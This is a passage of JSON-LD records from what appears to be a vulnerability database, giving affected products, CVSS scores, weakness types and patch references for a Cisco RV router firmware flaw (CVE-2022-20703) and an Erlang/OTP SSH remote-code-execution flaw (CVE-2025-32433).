          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20703"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of firmware updates. The issue results from the lack of proper validation of a firmware image when performing an upgrade. An attacker can leverage this vulnerability to execute code in the context of root",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20703"
          }
        ],
        "trust": 2.97
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20703",
            "trust": 4.7
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-413",
            "trust": 2.4
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-408",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15810",
            "trust": 0.7
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15611",
            "trust": 0.7
          },
          {
            "db": "CS-HELP",
            "id": "SB2022020301",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20703",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20703"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "id": "VAR-202202-0323",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2025-11-18T15:12:16.025000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Cisco has issued an update to correct this vulnerability.",
            "trust": 1.4,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "cisco-sa-smb-mult-vuln-KA9PK6D",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco Small Business Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=183257"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Known Exploited Vulnerabilities Detector",
            "trust": 0.1,
            "url": "https://github.com/Ostorlab/KEV "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-23305 "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-RCE "
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20703"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-295",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d"
          },
          {
            "trust": 2.4,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-408/"
          },
          {
            "trust": 1.7,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-413/"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20703"
          },
          {
            "trust": 1.0,
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2022-20703"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022020301"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/295.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20703"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20703"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "date": "2022-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20703"
          },
          {
            "date": "2022-02-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          },
          {
            "date": "2023-04-18T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "date": "2022-02-10T18:15:09.197000",
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20703"
          },
          {
            "date": "2023-06-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          },
          {
            "date": "2023-04-18T04:41:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "date": "2025-10-28T13:58:12.787000",
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Series router out-of-bounds write vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trust management problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202504-1178

    Vulnerability from variot - Updated: 2025-11-18 15:12

    Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules. ERLANG of Erlang/OTP Products from multiple vendors such as these contain vulnerabilities related to the lack of authentication for important functions.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202504-1178",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "confd basic",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.0.18"
          },
          {
            "model": "confd basic",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.1.16.2"
          },
          {
            "model": "network services orchestrator",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.3.8.1"
          },
          {
            "model": "smart phy",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "25.2"
          },
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "confd basic",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.4"
          },
          {
            "model": "cloud native broadband network gateway",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2025.03.1"
          },
          {
            "model": "network services orchestrator",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.3"
          },
          {
            "model": "network services orchestrator",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.8"
          },
          {
            "model": "network services orchestrator",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.2.11.1"
          },
          {
            "model": "network services orchestrator",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.4.4.1"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "staros",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2025.03"
          },
          {
            "model": "confd basic",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.2.11.1"
          },
          {
            "model": "inode manager",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "confd basic",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.4.4.1"
          },
          {
            "model": "ncs 2000 shelf virtualization orchestrator",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "25.1.1"
          },
          {
            "model": "erlang\\/otp",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "erlang",
            "version": "27.0"
          },
          {
            "model": "erlang\\/otp",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "erlang",
            "version": "27.3.3"
          },
          {
            "model": "ultra cloud core",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2025.03.1"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "confd basic",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.2"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "optical site manager",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "25.2.1"
          },
          {
            "model": "ultra services platform",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "network services orchestrator",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.7.19.1"
          },
          {
            "model": "confd basic",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.3.8.1"
          },
          {
            "model": "erlang\\/otp",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "erlang",
            "version": "25.3.2.20"
          },
          {
            "model": "network services orchestrator",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.1.16.2"
          },
          {
            "model": "network services orchestrator",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.4.2"
          },
          {
            "model": "confd basic",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.3"
          },
          {
            "model": "network services orchestrator",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.4"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "erlang\\/otp",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "erlang",
            "version": "26.2.5.11"
          },
          {
            "model": "confd basic",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "7.7.19.1"
          },
          {
            "model": "enterprise nfv infrastructure software",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.18"
          },
          {
            "model": "network services orchestrator",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.2"
          },
          {
            "model": "network services orchestrator",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.4.1.1"
          },
          {
            "model": "erlang\\/otp",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "erlang",
            "version": "26.0"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "debian",
            "version": "11.0"
          },
          {
            "model": "ultra packet core",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2025.03"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "cisco ultra cloud core",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco enterprise nfv infrastructure software",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco intelligent node manager",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "confd basic",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco ultra packet core",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco cloud native broadband network gateway",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco optical site manager",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco ultra services platform",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "erlang/otp",
            "scope": null,
            "trust": 0.8,
            "vendor": "erlang",
            "version": null
          },
          {
            "model": "cisco network services orchestrator",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco ncs 2000 shelf virtualization orchestrator",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco staros",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco smart phy",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "cve": "CVE-2025-32433",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "security-advisories@github.com",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2025-32433",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 10.0,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2025-006839",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "security-advisories@github.com",
                "id": "CVE-2025-32433",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2025-006839",
                "trust": 0.8,
                "value": "Critical"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules. ERLANG of Erlang/OTP Products from multiple vendors such as these contain vulnerabilities related to the lack of authentication for important functions.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2025-32433"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          }
        ],
        "trust": 1.62
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2025-32433",
            "trust": 2.6
          },
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2025/04/16/2",
            "trust": 1.8
          },
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2025/04/18/1",
            "trust": 1.8
          },
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2025/04/19/1",
            "trust": 1.8
          },
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2025/04/18/6",
            "trust": 1.8
          },
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2025/04/18/2",
            "trust": 1.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-25-140-07",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU96418823",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "id": "VAR-202504-1178",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2025-11-18T15:12:07.123000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top\u00a0Page",
            "trust": 0.8,
            "url": "https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a0d8650209cf54892f"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-306",
            "trust": 1.0
          },
          {
            "problemtype": "Lack of authentication for critical features (CWE-306) [ others ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "http://www.openwall.com/lists/oss-security/2025/04/16/2"
          },
          {
            "trust": 1.8,
            "url": "http://www.openwall.com/lists/oss-security/2025/04/18/1"
          },
          {
            "trust": 1.8,
            "url": "http://www.openwall.com/lists/oss-security/2025/04/18/2"
          },
          {
            "trust": 1.8,
            "url": "http://www.openwall.com/lists/oss-security/2025/04/18/6"
          },
          {
            "trust": 1.8,
            "url": "http://www.openwall.com/lists/oss-security/2025/04/19/1"
          },
          {
            "trust": 1.8,
            "url": "https://security.netapp.com/advisory/ntap-20250425-0001/"
          },
          {
            "trust": 1.8,
